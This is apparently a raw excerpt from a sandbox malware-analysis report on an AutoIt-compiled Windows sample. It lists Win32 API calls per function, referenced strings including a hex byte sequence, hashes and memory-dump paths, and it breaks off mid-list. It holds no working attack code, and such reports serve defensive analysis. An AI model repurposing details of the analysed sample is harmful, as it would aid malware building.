                                            • Opcode ID: 46d525f888fc8593845c33f3e26c32164c7ee7d8851c403981cb12d77c6b2d19
                                            • Instruction ID: 1897326c90b5e0c0af483f7f0f342968dff3a799097796932991b2e39e8b8151
                                            • Opcode Fuzzy Hash: 46d525f888fc8593845c33f3e26c32164c7ee7d8851c403981cb12d77c6b2d19
                                            • Instruction Fuzzy Hash: 14618C71910218FFDB119FA8ED48EEE7B79FB08320F108626F915AB2A1D6719950CF90
                                            APIs
                                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 002B8D34
                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002B8D45
                                            • CharNextW.USER32(0000014E), ref: 002B8D74
                                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 002B8DB5
                                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 002B8DCB
                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002B8DDC
                                            • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 002B8DF9
                                            • SetWindowTextW.USER32(?,0000014E), ref: 002B8E45
                                            • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 002B8E5B
                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 002B8E8C
                                            • _memset.LIBCMT ref: 002B8EB1
                                            • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 002B8EFA
                                            • _memset.LIBCMT ref: 002B8F59
                                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 002B8F83
                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 002B8FDB
                                            • SendMessageW.USER32(?,0000133D,?,?), ref: 002B9088
                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 002B90AA
                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 002B90F4
                                            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 002B9121
                                            • DrawMenuBar.USER32(?), ref: 002B9130
                                            • SetWindowTextW.USER32(?,0000014E), ref: 002B9158
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                            • String ID: 0
                                            • API String ID: 1073566785-4108050209
                                            • Opcode ID: e4ca3fe5e8bcf3e78413731e844db5b6405653cca3d75820b6e0f1a9baed7435
                                            • Instruction ID: 371f1e38234866ef96046d9d69c9fa0aebcee2f7ecd60f031c6a6da78d1e80ab
                                            • Opcode Fuzzy Hash: e4ca3fe5e8bcf3e78413731e844db5b6405653cca3d75820b6e0f1a9baed7435
                                            • Instruction Fuzzy Hash: 78E1B47092020AABDF20DF64CC88EFE7B7DEF05790F108156FA19A6190DB709A95DF60
                                            APIs
                                            • GetCursorPos.USER32(?), ref: 002B4C51
                                            • GetDesktopWindow.USER32 ref: 002B4C66
                                            • GetWindowRect.USER32(00000000), ref: 002B4C6D
                                            • GetWindowLongW.USER32(?,000000F0), ref: 002B4CCF
                                            • DestroyWindow.USER32(?), ref: 002B4CFB
                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 002B4D24
                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002B4D42
                                            • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 002B4D68
                                            • SendMessageW.USER32(?,00000421,?,?), ref: 002B4D7D
                                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 002B4D90
                                            • IsWindowVisible.USER32(?), ref: 002B4DB0
                                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 002B4DCB
                                            • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 002B4DDF
                                            • GetWindowRect.USER32(?,?), ref: 002B4DF7
                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 002B4E1D
                                            • GetMonitorInfoW.USER32(00000000,?), ref: 002B4E37
                                            • CopyRect.USER32(?,?), ref: 002B4E4E
                                            • SendMessageW.USER32(?,00000412,00000000), ref: 002B4EB9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                            • String ID: ($0$tooltips_class32
                                            • API String ID: 698492251-4156429822
                                            • Opcode ID: 8a98caec31bbf6bb4ecc60688d61f411393f797ed9ef388bdc56b3138396cd1a
                                            • Instruction ID: ebe0177c1113b12a298a2ae143376c6eff047e2bc534d62b7f48cf0657b99c4f
                                            • Opcode Fuzzy Hash: 8a98caec31bbf6bb4ecc60688d61f411393f797ed9ef388bdc56b3138396cd1a
                                            • Instruction Fuzzy Hash: 46B1AE70624301AFDB44EF24C989B9ABBE4FF89740F008A1DF5999B2A2D770EC54CB51
                                            APIs
                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 002328BC
                                            • GetSystemMetrics.USER32(00000007), ref: 002328C4
                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 002328EF
                                            • GetSystemMetrics.USER32(00000008), ref: 002328F7
                                            • GetSystemMetrics.USER32(00000004), ref: 0023291C
                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00232939
                                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00232949
                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0023297C
                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00232990
                                            • GetClientRect.USER32(00000000,000000FF), ref: 002329AE
                                            • GetStockObject.GDI32(00000011), ref: 002329CA
                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 002329D5
                                              • Part of subcall function 00232344: GetCursorPos.USER32(?), ref: 00232357
                                              • Part of subcall function 00232344: ScreenToClient.USER32(002F67B0,?), ref: 00232374
                                              • Part of subcall function 00232344: GetAsyncKeyState.USER32(00000001), ref: 00232399
                                              • Part of subcall function 00232344: GetAsyncKeyState.USER32(00000002), ref: 002323A7
                                            • SetTimer.USER32(00000000,00000000,00000028,00231256), ref: 002329FC
                                            Strings
                                            • 0066894dd2ba6c000000668955d433c0668945d6c745f000000000c745f800000000c745e400000000c745dc000000008d8d38feffff51e881d9ffffb930000000, xrefs: 0026C3D9
                                            • AutoIt v3 GUI, xrefs: 00232974
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                            • String ID: 0066894dd2ba6c000000668955d433c0668945d6c745f000000000c745f800000000c745e400000000c745dc000000008d8d38feffff51e881d9ffffb930000000$AutoIt v3 GUI
                                            • API String ID: 1458621304-776406380
                                            • Opcode ID: 9f2b9fb2f449eb70ccbe734a6d0d1eadafe52e8b432660791b292d19ddae3a63
                                            • Instruction ID: 66781456ca07ed23657e945bb8e1e48a4dc84de87ea67a4d4c886140f1f38ac3
                                            • Opcode Fuzzy Hash: 9f2b9fb2f449eb70ccbe734a6d0d1eadafe52e8b432660791b292d19ddae3a63
                                            • Instruction Fuzzy Hash: B9B16071A2020AEFDB14DF68DD49BAD7BB4FB08354F108229FA15E7290DB74A864CF50
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: _wcscat$_wcscmp_wcscpy_wcsncpy_wcsstr
                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                            • API String ID: 3576275495-1459072770
                                            • Opcode ID: a4e175e13b0a8c7e10af88ba6f9fc95708f87b9bab2e4a31732210fbe733c811
                                            • Instruction ID: 4319f6c5582eba4e72eaa5fb850081c168053d493789fd40d23ecc2d7a8fbcfc
                                            • Opcode Fuzzy Hash: a4e175e13b0a8c7e10af88ba6f9fc95708f87b9bab2e4a31732210fbe733c811
                                            • Instruction Fuzzy Hash: CC414731930205BADB10BB649C47EBFB7ACEF42751F000166FD04F6182EB70A9359BA9
                                            APIs
                                            • CharUpperBuffW.USER32(?,?), ref: 002B40F6
                                            • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 002B41B6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: BuffCharMessageSendUpper
                                            • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                            • API String ID: 3974292440-719923060
                                            • Opcode ID: 32393a4110f4329422593b1776ff5aaf5125800112c017827d87f5e5d9a20cb6
                                            • Instruction ID: 83c7f26393c6fe3ad0da5012aa43fdec03e24994268c82cff24d0a9ee077c52b
                                            • Opcode Fuzzy Hash: 32393a4110f4329422593b1776ff5aaf5125800112c017827d87f5e5d9a20cb6
                                            • Instruction Fuzzy Hash: 94A19E702343029FCB14FF24C981AAAB3E5AF85354F144969B8A69B2D3DB70EC65CF41
                                            APIs
                                            • LoadCursorW.USER32(00000000,00007F89), ref: 002A5309
                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 002A5314
                                            • LoadCursorW.USER32(00000000,00007F00), ref: 002A531F
                                            • LoadCursorW.USER32(00000000,00007F03), ref: 002A532A
                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 002A5335
                                            • LoadCursorW.USER32(00000000,00007F01), ref: 002A5340
                                            • LoadCursorW.USER32(00000000,00007F81), ref: 002A534B
                                            • LoadCursorW.USER32(00000000,00007F88), ref: 002A5356
                                            • LoadCursorW.USER32(00000000,00007F80), ref: 002A5361
                                            • LoadCursorW.USER32(00000000,00007F86), ref: 002A536C
                                            • LoadCursorW.USER32(00000000,00007F83), ref: 002A5377
                                            • LoadCursorW.USER32(00000000,00007F85), ref: 002A5382
                                            • LoadCursorW.USER32(00000000,00007F82), ref: 002A538D
                                            • LoadCursorW.USER32(00000000,00007F84), ref: 002A5398
                                            • LoadCursorW.USER32(00000000,00007F04), ref: 002A53A3
                                            • LoadCursorW.USER32(00000000,00007F02), ref: 002A53AE
                                            • GetCursorInfo.USER32(?), ref: 002A53BE
                                            • GetLastError.KERNEL32(00000001,00000000), ref: 002A53E9
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Cursor$Load$ErrorInfoLast
                                            • String ID:
                                            • API String ID: 3215588206-0
                                            • Opcode ID: b7e9c54d206fced7cfa7f9eb854557593d0852ff3f7b42aca12dc3bab739b22c
                                            • Instruction ID: 74365b1f170b876272025b25c6aa5447e3db75a080bd5f29a0e35ae63cc48a1e
                                            • Opcode Fuzzy Hash: b7e9c54d206fced7cfa7f9eb854557593d0852ff3f7b42aca12dc3bab739b22c
                                            • Instruction Fuzzy Hash: E9417370E183296BDB109FBA8C4986FFFF8EF55B10B10452FA509E7291DAB89401CE51
                                            APIs
                                            • GetClassNameW.USER32(?,?,00000100), ref: 0028AAA5
                                            • __swprintf.LIBCMT ref: 0028AB46
                                            • _wcscmp.LIBCMT ref: 0028AB59
                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0028ABAE
                                            • _wcscmp.LIBCMT ref: 0028ABEA
                                            • GetClassNameW.USER32(?,?,00000400), ref: 0028AC21
                                            • GetDlgCtrlID.USER32(?), ref: 0028AC73
                                            • GetWindowRect.USER32(?,?), ref: 0028ACA9
                                            • GetParent.USER32(?), ref: 0028ACC7
                                            • ScreenToClient.USER32(00000000), ref: 0028ACCE
                                            • GetClassNameW.USER32(?,?,00000100), ref: 0028AD48
                                            • _wcscmp.LIBCMT ref: 0028AD5C
                                            • GetWindowTextW.USER32(?,?,00000400), ref: 0028AD82
                                            • _wcscmp.LIBCMT ref: 0028AD96
                                              • Part of subcall function 0025386C: _iswctype.LIBCMT ref: 00253874
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                            • String ID: %s%u
                                            • API String ID: 3744389584-679674701
                                            • Opcode ID: f5f365bd5af533696fb0630d81bbe484b93ad998a729a43408bc7d3559b26c09
                                            • Instruction ID: 09f5e5a02423edadfe5328b9c5158b6d86aadf901a420bce8bdb45b1d143db8c
                                            • Opcode Fuzzy Hash: f5f365bd5af533696fb0630d81bbe484b93ad998a729a43408bc7d3559b26c09
                                            • Instruction Fuzzy Hash: 27A1C275225307AFE714EF24C884BAAF7E8FF04355F00462AF999C2591DB30E965CB92
                                            APIs
                                            • GetClassNameW.USER32(00000008,?,00000400), ref: 0028B3DB
                                            • _wcscmp.LIBCMT ref: 0028B3EC
                                            • GetWindowTextW.USER32(00000001,?,00000400), ref: 0028B414
                                            • CharUpperBuffW.USER32(?,00000000), ref: 0028B431
                                            • _wcscmp.LIBCMT ref: 0028B44F
                                            • _wcsstr.LIBCMT ref: 0028B460
                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 0028B498
                                            • _wcscmp.LIBCMT ref: 0028B4A8
                                            • GetWindowTextW.USER32(00000002,?,00000400), ref: 0028B4CF
                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 0028B518
                                            • _wcscmp.LIBCMT ref: 0028B528
                                            • GetClassNameW.USER32(00000010,?,00000400), ref: 0028B550
                                            • GetWindowRect.USER32(00000004,?), ref: 0028B5B9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                            • String ID: @$ThumbnailClass
                                            • API String ID: 1788623398-1539354611
                                            • Opcode ID: 9e556b2f1807ac7394387be9df8a17adb9963bdfa6607d5f0e2310c5b2639805
                                            • Instruction ID: 53f14fae01456bec2c3f9410a1c621596ea224cc240f696abe1a3d1a0ad494ee
                                            • Opcode Fuzzy Hash: 9e556b2f1807ac7394387be9df8a17adb9963bdfa6607d5f0e2310c5b2639805
                                            • Instruction Fuzzy Hash: D281C1750253069BDB06EF10C885FAABBE8EF44314F08856DFD858A0D2EB34DD69CB61
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: __wcsnicmp
                                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                            • API String ID: 1038674560-1810252412
                                            • Opcode ID: 0fd8f6a371e0cc791445af3b5d0a9df9c978ed24c7214edde66acbeb2d617327
                                            • Instruction ID: 7cbd4f486568406d8bee5320b9b0b87a72871e267a923e7168d370a9c924f8d7
                                            • Opcode Fuzzy Hash: 0fd8f6a371e0cc791445af3b5d0a9df9c978ed24c7214edde66acbeb2d617327
                                            • Instruction Fuzzy Hash: BD3124B49B4246A6DF21FE61CC43EEEB7A89F21750FA0001AF805710D6EF616E38CA51
                                            APIs
                                            • LoadIconW.USER32(00000063), ref: 0028C4D4
                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0028C4E6
                                            • SetWindowTextW.USER32(?,?), ref: 0028C4FD
                                            • GetDlgItem.USER32(?,000003EA), ref: 0028C512
                                            • SetWindowTextW.USER32(00000000,?), ref: 0028C518
                                            • GetDlgItem.USER32(?,000003E9), ref: 0028C528
                                            • SetWindowTextW.USER32(00000000,?), ref: 0028C52E
                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0028C54F
                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0028C569
                                            • GetWindowRect.USER32(?,?), ref: 0028C572
                                            • SetWindowTextW.USER32(?,?), ref: 0028C5DD
                                            • GetDesktopWindow.USER32 ref: 0028C5E3
                                            • GetWindowRect.USER32(00000000), ref: 0028C5EA
                                            • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0028C636
                                            • GetClientRect.USER32(?,?), ref: 0028C643
                                            • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0028C668
                                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0028C693
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                            • String ID:
                                            • API String ID: 3869813825-0
                                            • Opcode ID: 6ce3a54497468b12d89d36ea7a89b0a6f13a1d2e5e715fc8e4993e0ed15540d8
                                            • Instruction ID: c54a519ef5a6e2c5c4fab1a2e39d60c03e7325424c8d98c9b25e33edcc852f9e
                                            • Opcode Fuzzy Hash: 6ce3a54497468b12d89d36ea7a89b0a6f13a1d2e5e715fc8e4993e0ed15540d8
                                            • Instruction Fuzzy Hash: 1B518274900709AFDB20EFA8DE89B6EBBF5FF04704F104629E692A25A0D774B954CF50
                                            APIs
                                            • _memset.LIBCMT ref: 002BA4C8
                                            • DestroyWindow.USER32(?), ref: 002BA542
                                              • Part of subcall function 00237D2C: _memmove.LIBCMT ref: 00237D66
                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 002BA5BC
                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 002BA5DE
                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002BA5F1
                                            • DestroyWindow.USER32(00000000), ref: 002BA613
                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00230000,00000000), ref: 002BA64A
                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002BA663
                                            • GetDesktopWindow.USER32 ref: 002BA67C
                                            • GetWindowRect.USER32(00000000), ref: 002BA683
                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 002BA69B
                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 002BA6B3
                                              • Part of subcall function 002325DB: GetWindowLongW.USER32(?,000000EB), ref: 002325EC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
